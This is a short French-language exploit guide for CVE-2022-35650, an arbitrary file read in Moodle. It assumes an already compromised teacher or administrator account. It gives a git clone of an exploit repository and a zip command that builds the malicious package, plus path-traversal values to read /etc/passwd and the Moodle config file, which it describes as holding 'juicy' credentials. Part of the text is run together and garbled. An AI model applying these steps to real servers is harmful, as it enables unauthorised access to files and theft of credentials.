
Exploit pour CVE-2022-35650, une lecture de fichier arbitraire Moodle.
Ceci est une lecture arbitraire de fichier dans Moodle.
Vous devez avoir compromis un utilisateur de niveau enseignant ou administrateur.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd) est téléchargé/etc/passwdSi vous souhaitez lire le fichier de configuration (avec des identifiants juteux), définissez votre baseurl dans imsmanifest.xml comme suit :
../../../../../../../../../../../var/www/html
et la src de votre img dans pool.dat comme suit :
muc/config.php